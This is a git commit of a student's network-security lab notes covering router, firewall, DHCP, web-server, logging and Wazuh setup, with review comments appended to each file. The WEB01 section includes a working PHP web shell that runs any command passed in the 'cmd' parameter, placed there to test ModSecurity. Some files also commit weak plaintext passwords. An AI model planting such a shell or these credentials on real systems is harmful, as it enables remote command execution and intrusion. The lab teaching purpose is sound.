migrate to git.charlotte.sh

Charlotte Croce 2025-04-19 23:42:08 -04:00
commit fbd588721e
412 changed files with 13750 additions and 0 deletions

View file

@ -0,0 +1,57 @@
# DHCP01 Configuration
## Basic Setup
- Set hostname to `dhcp01-charlotte`
- Add sudo user `charlotte`
Set network via netplan:
- IP Address: `172.16.150.151/24`
- Gateway & DNS: `172.16.150.2`
- Network adapter: LAN
## Install and Configure DHCP Server
Install DHCP server
```bash
sudo apt update
sudo apt install isc-dhcp-server -y
```
Configure DHCP server
```bash
> sudo nano /etc/dhcp/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 172.16.150.255;
option routers 172.16.150.2;
option domain-name-servers 172.16.150.2;
subnet 172.16.150.0 netmask 255.255.255.0 {
range 172.16.150.100 172.16.150.150;
}
```
Configure the interface for DHCP server:
```bash
> sudo nano /etc/default/isc-dhcp-server
...
INTERFACESv4="ens160"
INTERFACESv6=""
...
```
Start and enable DHCP server
```bash
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server
```
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='dhcp01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
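Review bot: the Wazuh agent step fetches `wazuh-agent-4.7.5-1.amd64.deb` with curl and hands it straight to `dpkg -i` with no signature or checksum check, so a tampered download would be installed silently; prefer adding the Wazuh apt repository with its GPG key and installing with `apt install wazuh-agent`, or at least compare the package against its published checksum before `dpkg -i`. Also worth stating in the doc: `isc-dhcp-server` is end-of-life upstream (ISC retired ISC DHCP in 2022 in favour of Kea), so readers know this is a lab choice rather than a recommendation. Minor style point: the `> sudo nano /etc/dhcp/dhcpd.conf` prompt line sits inside the same `bash` fence as the file contents, so the block is neither a runnable command nor a clean copy of the file; split the edit command from the file body, and the same applies to the `/etc/default/isc-dhcp-server` block.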

View file

@ -0,0 +1,197 @@
# EDGE01 Configuration
## Initial Setup
- Change password:
```
configure
set system login user vyos authentication plaintext-password password123!
commit
save
```
- Change hostname:
```
configure
set system host-name edge01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway and DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
# Port Forwarding for HTTP
set nat destination rule 10 description "HTTP->NGINX01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
# Port Forwarding for SSH
set nat destination rule 20 description "SSH->JUMP"
set nat destination rule 20 inbound-interface eth0
set nat destination rule 20 destination port 22
set nat destination rule 20 protocol tcp
set nat destination rule 20 translation address 172.16.50.4
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
```
configure
# Create Zone-Based Firewalls
# WAN-to-DMZ
set firewall name WAN-to-DMZ default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
set firewall name WAN-to-DMZ rule 10 description "allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
set firewall name WAN-to-DMZ rule 20 action accept
set firewall name WAN-to-DMZ rule 20 description "SSH to JUMP"
set firewall name WAN-to-DMZ rule 20 destination address 172.16.50.4
set firewall name WAN-to-DMZ rule 20 destination port 22
set firewall name WAN-to-DMZ rule 20 protocol tcp
# DMZ-to-WAN
set firewall name DMZ-to-WAN default-action drop
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
# LAN-to-DMZ
set firewall name LAN-to-DMZ default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
# DMZ-to-LAN
set firewall name DMZ-to-LAN default-action drop
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
# LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
# WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
# Apply Zone Policies
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
commit
save
```
## Rip Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## SSH Configuration
```
# Restrict SSH access to LAN interface only
configure
set service ssh listen-address 172.16.150.2
commit
save
```
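Review bot: the initial-setup block commits the router's login password in clear text (`set system login user vyos authentication plaintext-password password123!`); VyOS hashes it on commit, but this document now carries the secret in git history, so replace it with a placeholder and set the real value interactively. Second, the `DMZ-to-WAN` ruleset accepts only `state established` under `default-action drop`, so the package downloads the nginx01 and web01 docs rely on (`apt`, `yum`, `curl` to packages.wazuh.com) would be dropped; either add an explicit outbound rule for the DMZ hosts or note that the policy is relaxed during installs. Third, RIP is enabled on `eth2` (the LAN segment) with no authentication, so any LAN host can advertise routes to the router; enable RIP md5 authentication on the interface on both edge01 and fw-mgmt. Minor: the `state established` rules do not also match `related`, so ICMP error messages tied to allowed flows are dropped, which makes path problems harder to diagnose.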

View file

@ -0,0 +1,52 @@
# FW-MGMT Configuration
## Interface Configuration
```
configure
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set system name-server 172.16.150.2
commit
save
```
## DNS Forwarding
```
configure
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
commit
save
```
## Firewall Configuration
copy current configuration form `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
commit
save
```
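Review bot: the Firewall Configuration section only says "copy current configuration form `configs` directory" ("form" should be "from"), and the zone-policy block defines the `LAN` and `MGMT` zones without attaching any ruleset, so this file alone does not show how the MGMT zone is protected; at minimum name the file under `configs` to copy and list the flows the rulesets must allow (agent traffic to 172.16.200.10 on 1514/1515 from LAN and DMZ, dashboard access on 443 from mgmt01), since the other docs depend on them. Also missing compared with edge01: a `set system host-name`, an SSH `listen-address` restriction, and the password change; and RIP on `eth0` runs without authentication here as well.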

View file

@ -0,0 +1,109 @@
# FW01 Configuration
## Initial Setup
- Change password:
```
set system login user vyos authentication plaintext-password password
```
## Hostname Configuration
```
configure
set system host-name fw01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
copy current configuration from `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## Syslog Configuration (remove when appropriate)
```
# When log01 is active
set system syslog host 172.16.50.5 facility authpriv level info
# When log01 is retired
delete system syslog host 172.16.50.5
```
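Review bot: this file duplicates edge01's interface addresses (10.0.17.151/24, 172.16.50.2/29, 172.16.150.2/24) and routing, so both routers cannot be on the network at once; if fw01 is the predecessor that edge01 replaced, say so at the top, otherwise the overlap is an error. The password block sets `plaintext-password password` with a literal (and weak) value and, unlike every other block here, omits `configure` / `commit` / `save`, so it is not a complete change; use a placeholder and set the password interactively. The syslog step (`set system syslog host 172.16.50.5 facility authpriv level info`) ships authentication logs over plain UDP syslog into the DMZ; note that they travel unencrypted and that a collector in the less trusted zone receives them.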

View file

@ -0,0 +1,123 @@
# LOG01 Configuration
> **Note**: This is the original log01 server that will eventually be retired, then brought back as a jump server.
## Basic Setup
- Set hostname to `log01-charlotte`
- Add sudo user `charlotte:password`
- Set network adapter to DMZ
- Configure static IP via nmtui:
- IP Address: `172.16.50.5/29`
- Gateway & DNS: `172.16.50.2`
## Configure Firewall for Syslog
```
sudo firewall-cmd --add-port=514/tcp --permanent
sudo firewall-cmd --add-port=514/udp --permanent
sudo firewall-cmd --reload
```
## Configure Rsyslog
### Enable Syslog Input Modules
Edit `/etc/rsyslog.conf` and uncomment these lines:
```
# Provides UDP syslog reception
module(load="imudp")
input(type="imudp" port="514")
# Provides TCP syslog reception
module(load="imtcp")
input(type="imtcp" port="514")
```
### Configure High Precision Timestamps
Add to `/etc/rsyslog.conf`:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Organization
Create a file named `/etc/rsyslog.d/sec350.conf` with these contents:
```
# Input modules
module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")
# Creating templates for storing logs dynamically
$template DynFile,"/var/log/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
$template RemoteLogs,"/var/log/remote/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
# Create a ruleset for remote devices
ruleset(name="RemoteDevice"){
action(type="omfile" dynaFile="RemoteLogs")
}
# Direct local logs to files
:programname, !startswith, "rsyslog" ?DynFile
# Direct messages from remote hosts to the ruleset
:inputname, isequal, "imudp" call RemoteDevice
:inputname, isequal, "imtcp" call RemoteDevice
```
### Restart Rsyslog
```
sudo systemctl restart rsyslog
```
## Monitor Incoming Logs
```
tail -f /var/log/messages
```
Or check specific remote log files:
```
tail -f /var/log/remote/*/*/*/*/sshd.log
```
## Recommissioned as Jump Server
When log01 is repurposed as a jump server:
1. Change IP address to: `172.16.50.4/29`
2. Change hostname: `sudo hostnamectl set-hostname jump-charlotte`
### SSH Configuration for Passwordless Access
```bash
# Create dedicated user for jump access
useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
# Disable password authentication
sudo sed -i 's/PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# Create SSH directory structure with proper permissions
mkdir -p /home/charlotte-jump/.ssh
chmod 700 /home/charlotte-jump/.ssh
# Add the public key to authorized_keys
echo "ssh-rsa AAAAB3N...your-public-key..." >> /home/charlotte-jump/.ssh/authorized_keys
# Set proper permissions and ownership
chmod 600 /home/charlotte-jump/.ssh/authorized_keys
chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
# Restart SSH service
systemctl restart sshd
```
### Wazuh Agent Installation
```bash
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
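Review bot: the `PasswordAuthentication` sed in the jump-server section (`sudo sed -i 's/PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config`) keeps any leading `#`, so on a stock sshd_config where the directive ships as `#PasswordAuthentication yes` the result is still a comment and password logins stay enabled; match the optional comment marker (for example `s/^#\?PasswordAuthentication.*/PasswordAuthentication no/`) and confirm with `sudo sshd -T | grep -i passwordauthentication` before relying on key-only access to a port that edge01 forwards from the WAN. Second, `/etc/rsyslog.d/sec350.conf` loads `imudp`/`imtcp` and declares port 514 inputs a second time after the same lines were uncommented in `/etc/rsyslog.conf`; rsyslog reports an error for a module loaded twice and the second input cannot bind the port, so keep the module and input lines in one place (the include file is the natural one, with `ruleset="RemoteDevice"` set directly on the inputs instead of the `:inputname` filters). Third, the firewalld rules open 514/tcp and 514/udp to every source; rich rules limited to the DMZ and LAN subnets would narrow who can write into `/var/log/remote`. Minor: the Wazuh step runs `rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm` without the download step (and at a different version than the 4.7.5 used elsewhere), and `useradd`, `mkdir`, `chown` and `systemctl restart sshd` lack the `sudo` that the `sed` has.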

View file

@ -0,0 +1,27 @@
# MGMT01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.10/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Chrome Remote Desktop Setup
1. Open Chrome and sign in with charlotte.croce@mymail.champlain.edu
2. Enable sync if prompted
3. Go to remotedesktop.google.com and install the app
4. On your main host (laptop):
- Go to https://g.co/crd/headless
- Download and install the Chrome Remote Desktop package
- For dependency issues:
```
sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb
sudo dpkg -i google-chrome-stable_current_amd64
```
5. Follow the setup prompts and create a PIN
6. Log out of the remote computer before attempting to connect
## Notes
- With current firewall configs, this machine should be able to access:
- SSH to systems in the DMZ (port 22)
- HTTPS access to wazuh server (port 443)
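Review bot: the dependency-fix block runs `sudo dpkg -i google-chrome-stable_current_amd64` without the `.deb` suffix, so the command fails as written; the downloaded file is `google-chrome-stable_current_amd64.deb`. Step 4 also reads as if the headless host package is installed on the laptop: the page at `g.co/crd/headless` is visited from another machine, but the package and the setup command it generates belong on the machine being controlled (MGMT01), so say on which host each sub-step runs. From a security standpoint, Chrome Remote Desktop makes the management workstation reachable through Google's relay regardless of the edge01 zone policy, so access to this host is now only as strong as the Google account's sign-in protection and the PIN; state that explicitly, and drop the personal e-mail address from the committed doc.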

View file

@ -0,0 +1,7 @@
# MGMT02 Configuration
## Network Configuration
- Configure static IP:
- IP Address: `172.16.200.11/28`
- Gateway & DNS: `172.16.200.2`
- Network: MGMT

View file

@ -0,0 +1,35 @@
# NGINX01 Configuration
## Basic Setup
- Set hostname to `nginx01-charlotte`
- Add sudo user `charlotte`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure NGINX
```bash
# Install NGINX
sudo apt update
sudo apt install nginx -y
sudo systemctl enable nginx
sudo systemctl start nginx
# Create custom index page
echo "<h1>NGINX01 - Charlotte Croce</h1>" | sudo tee /var/www/html/index.html
```
* Remember to add firewall and port forwarding rule for this new IP!
* Also, add firewall-cmd rules if applicable
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='nginx01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
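Review bot: nginx01 takes the same DMZ address as web01 (`172.16.50.3/29`) and is the target of edge01's `HTTP->NGINX01` forward, so only one of the two hosts can be live; state at the top which host this replaced. The reminder "add firewall-cmd rules if applicable" does not apply to this Ubuntu build, whose default host firewall front end is ufw (`sudo ufw allow 80/tcp` if ufw is enabled); firewall-cmd is the CentOS/Rocky tool used on web01 and log01. Same `curl ... && dpkg -i` install without package verification as on dhcp01; the Wazuh apt repository with its signing key is the safer route.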

View file

@ -0,0 +1,37 @@
# RW01 Configuration
## Basic Setup
- Set hostname to `rw01-charlotte`
- Add sudo user `charlotte:password`
- IP Address: `10.0.17.51/24`
- Gateway & DNS: `10.0.17.2`
## Static Route for DMZ Access
```bash
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## Rsyslog Configuration for High Precision Timestamps
1. Edit `/etc/rsyslog.conf`
2. Comment out this line to enable high precision timestamps:
```
# $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
```
3. Restart rsyslog:
```bash
sudo systemctl restart rsyslog
```
## SSH Key Creation for Jump Server Access
Generate a dedicated SSH key for jump server access:
```bash
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server using this key:
```bash
ssh -i ~/.ssh/jump-charlotte charlotte-jump@172.16.50.4
```
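Review bot: the static-route block adds the DMZ route with `ip route add` and then restarts NetworkManager; a route added outside the connection profile can be discarded when NetworkManager re-applies the profile and is lost on reboot in any case, so the `traceroute` on the next line may fail. Make the route part of the profile instead (`nmcli connection modify <profile> +ipv4.routes "172.16.50.0/29 10.0.17.151"` followed by `nmcli connection up <profile>`, where `<profile>` is the active connection name). The rsyslog step is correct but deserves a word of explanation: commenting out `RSYSLOG_TraditionalFileFormat` falls back to the default `RSYSLOG_FileFormat`, which carries the high-precision RFC 3339 timestamp. Minor: for a new key, `ssh-keygen -t ed25519` is the modern default; RSA-4096 still works but is larger and slower.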

View file

@ -0,0 +1,24 @@
# TRAVELER Configuration
Windows machine to replace RW01
## Network Configuration
- System is on WAN network
- IP address: `10.0.17.51/24`
- Default gateway: `10.0.17.2`
- DNS server: `10.0.17.2`
## SSH Key Creation for Jump Server Access
Generate SSH keys using PowerShell:
```bash
# Generate new SSH key
ssh-keygen -t rsa -b 4096 -C "traveler to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server:
```powershell
ssh -i C:\Users\username\.ssh\jump-charlotte charlotte-jump@10.0.17.151
```
Web Access
Can access nginx01 via `http://10.0.17.151:80` (port forwarded through edge-01)
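Review bot: the key-generation fence is tagged `bash` although the heading says PowerShell, and the Windows path in the connect command (`C:\Users\username\.ssh\jump-charlotte`) confirms the shell; tag both blocks `powershell` and mark `username` as a placeholder. Connecting to `charlotte-jump@10.0.17.151` works only because edge01's destination NAT rule 20 forwards WAN port 22 to the jump host, which is worth stating here so the reader knows why the jump server's own address is not used. "Web Access" is missing its `##` heading marker. Same note as rw01: `ed25519` is the better default key type.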

View file

@ -0,0 +1,69 @@
# Wazuh Server Configuration
## Network Configuration
- Set hostname: `sudo hostnamectl hostname wazuh-charlotte`
- Configure static IP with netplan by editing `/etc/netplan/00-installer-config.yaml`:
```yaml
network:
ethernets:
ens160:
addresses:
- 172.16.200.10/28
nameservers:
addresses: [172.16.200.2]
routes:
- to: default
via: 172.16.200.2
version: 2
```
- Apply netplan configuration:
```
sudo netplan apply
```
## Wazuh Installation
> **IMPORTANT**: Take a snapshot before installation
Run the single-node installation command:
```
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i
```
> Note: The `-i` flag ignores minimum requirements of 2 CPU and 4 GB RAM
**IMPORTANT**: Save the auto-generated password shown after installation, you will need it later.
## Accessing the Wazuh Dashboard
- Try accessing the dashboard at: http://172.16.200.10/app/login
- Login with the auto-generated credentials
## Wazuh Agent Management
1. Create a new agent group:
- Wazuh dropdown > Management > Groups > Create a new group called "linux"
2. Deploy a new agent:
- Wazuh dropdown > Agents > Deploy a new agent
- Configuration options:
- OS: Redhat/CentOS
- Version: CentOS 6 or higher (works on Rocky 8)
- Architecture: x86_64
- Server IP: 172.16.200.10
- Agent Group: Linux
3. The web interface will generate an installation command for your agents
## Firewall Requirements
Ensure these ports are open:
- **1514/TCP** for agent communication
- **1515/TCP** for enrollment via automatic agent request
- **55000/TCP** for enrollment via Wazuh server API
## Agent Directory Structure
Wazuh agent files are stored in `/var/ossec/`. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring
## Viewing Security Events
Dropdown > Modules > Security Events
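Review bot: the dashboard link `http://172.16.200.10/app/login` should be `https://`; the single-node installer puts the Wazuh dashboard behind TLS on port 443 with a self-signed certificate, which is also what mgmt01's note ("HTTPS access to wazuh server (port 443)") expects, and the browser certificate warning on first visit should be mentioned. The agent group is created as `linux` in step 1 but selected as `Linux` in step 2; group names are directories under `/var/ossec/etc/shared/` on the manager and the other docs pass `WAZUH_AGENT_GROUP='linux'`, so keep the case consistent. The installer is downloaded and executed in one line (`curl -sO ... && sudo bash ./wazuh-install.sh -a -i`) with no verification; the snapshot advice covers rollback, but a checksum check on the script before running it as root would cover tampering.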

View file

@ -0,0 +1,104 @@
# WEB01 Configuration
## Basic Setup
- Set hostname to `web01-charlotte`
- Add sudo user `charlotte:password`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure HTTPD
```
# Install apache web server
sudo yum install httpd
sudo systemctl enable httpd
sudo systemctl start httpd
# If you need to edit the main config file:
sudo vi /etc/httpd/conf/httpd.conf
```
## Rsyslog Configuration
### Install rsyslog (if not installed)
```
sudo yum install rsyslog
```
### Configure Rsyslog for High Precision Timestamps
Edit `/etc/rsyslog.conf` and add these lines:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Note: ModSecurity will prevent dangerous commands like cat /etc/passwd while allowing safe commands like whoami and /sbin/ifconfig.
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Forwarding (when log01 is active)
Create a file at `/etc/rsyslog.d/sec350.conf` with these contents:
```
# For general logging
user.notice @172.16.50.5
# For authentication logging
authpriv.* @172.16.50.5
```
Restart rsyslog:
```
sudo systemctl restart rsyslog
```
## Install Wazuh Agent
```
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## CentOS Repo Fix (if needed)
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```
## Web Application Firewall (ModSecurity)
Install ModSecurity and PHP:
```bash
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
## Create Test PHP Webshell
Create `/var/www/html/shell.php` with the following content:
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
> [!Note]
> ModSecurity will prevent dangerous commands like `cat /etc/passwd` while allowing safe commands like `whoami` and `/sbin/ifconfig`.
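Review bot: the sentence "Note: ModSecurity will prevent dangerous commands..." at the end of the rsyslog timestamp section is a stray copy of the admonition that closes the file; delete the first one. The ModSecurity section installs `mod_security` and `mod_security_crs` plus PHP but never reloads httpd, so nothing is enforced until `sudo systemctl restart httpd`; verify with `httpd -M | grep security2` and check that `SecRuleEngine On` is set in `/etc/httpd/conf.d/mod_security.conf` before trusting the note about blocked commands. The test page `/var/www/html/shell.php` executes arbitrary commands, and edge01 forwards WAN port 80 to this host, so it is reachable from the WAN zone as soon as it is created; keep it behind an Apache `Require ip` for the LAN/MGMT test hosts and remove it when the WAF exercise is done. The CentOS repo fix that points yum at vault.centos.org is a sign this release is end-of-life and no longer receives security updates, which should be stated next to it. Minor: `user.notice @172.16.50.5` uses a single `@` (UDP); log01 also listens on TCP, so `@@` gives reliable delivery for the auth logs.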

View file

@ -0,0 +1,10 @@
# WKS01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.50/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Notes
- This workstation has HTTP access to web01 in the DMZ through firewall rules